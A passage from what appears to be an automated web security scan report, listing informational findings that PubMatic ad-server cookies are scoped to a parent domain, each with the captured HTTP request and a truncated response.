Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:52:59 GMT
Content-Length: 1734
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:52:58 GMT; path=/
Set-Cookie: pubfreq_26621_21556_1478501671=559-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:32:59 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:59 GMT; path=/

document.write('<div id="http_www_igougo_comaboutkomli_ads_frame22662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=/GcAAP1nAAA0VAAAAAA
...[SNIP]...

13.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21557&kadwidth=728&kadheight=90&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21557/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121557559adtag_htmlkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A53%3A3&ranreq=0.2315859266091138&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21557/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:00 GMT
Content-Length: 1389
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:00 GMT; path=/
Set-Cookie: pubfreq_26621_21557_1797109372=921-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:00 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121557559adtag_htmlkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...

13.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4_0&hotel=omni_hotels&random=656365&tile=564238840132219&section=detailskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A11%3A12&ranreq=0.7082862977404147&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26072=823-2:1098-2

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:12:49 GMT
Content-Length: 1910
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:12:49 GMT; path=/
Set-Cookie: _curtime=1317600769; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:22:49 GMT; path=/
Set-Cookie: camfreq_749312571=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:52:49 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:12:49 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...

13.125. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&kadNetwork=6&prevkadIds=21556_21556&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame32662026621&kltstamp=2011-9-2%2020%3A53%3A13&ranreq=0.44594317954033613&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:; pubfreq_26621_21557_1797109372=921-1; __qca=P0-585104895-1317606788364; pubfreq_26621_21556_427351122=207-1; PUBMDCID=1; pubfreq_26621_21556_1914588461=6-1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:09 GMT
Content-Length: 1392
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:09 GMT; path=/
Set-Cookie: pubfreq_26621_21556_126284783=921-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:09 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame32662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...

13.126. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A13%3A24&ranreq=0.780912266112864&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; pubfreq_26072=823-3:1098-3; PUBMDCID=1; _curtime=1317600804; camfreq_126550188=3663-1_1317687204; pubfreq_26072_21043_618709548=243-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1905
Date: Mon, 03 Oct 2011 00:14:52 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:14:52 GMT; path=/
Set-Cookie: _curtime=1317600892; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:24:52 GMT; path=/
Set-Cookie: camfreq_1175871307=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:54:52 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:14:52 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...

13.127. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1710
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: pubfreq_26072_21044_1115692444=823-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAAAAAAAAAAAAAAAAAAA
...[SNIP]...

13.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21043&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A13%3A21&ranreq=0.6788685892242938&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PMDTSHR=cat:; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; KTPCACOOKIE=YES; pubfreq_26072=823-3:1098-3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1903
Date: Mon, 03 Oct 2011 00:14:32 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:14:32 GMT; path=/
Set-Cookie: _curtime=1317600872; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:24:32 GMT; path=/
Set-Cookie: camfreq_1933189234=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:54:32 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:14:32 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAAzUgAATw4AAA8dAAAAAAAAA
...[SNIP]...

13.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21557&kadwidth=728&kadheight=90&kbgColor=FFFFFF&ktextColor=000000&klinkColor=008EB7&pageURL=http://www.igougo.com/about/&frameName=http_www_igougo_comaboutkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A52%3A57&ranreq=0.7452815969008952&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x47&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBMDCID=1; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:52:54 GMT
Content-Length: 1734
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:52:54 GMT; path=/
Set-Cookie: pubfreq_26621=; domain=pubmatic.com; expires=Wed, 05-Oct-2011 01:52:54 GMT; path=/
Set-Cookie: pubtime_26621=TMC; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:54 GMT; path=/
Set-Cookie: pubfreq_26621_21557_1687682837=559-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:32:54 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:54 GMT; path=/

document.write('<div id="http_www_igougo_comaboutkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=/GcAAP1nAAA1VAAAAAA
...[SNIP]...

13.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21043&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A1&ranreq=0.3272909566294402&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
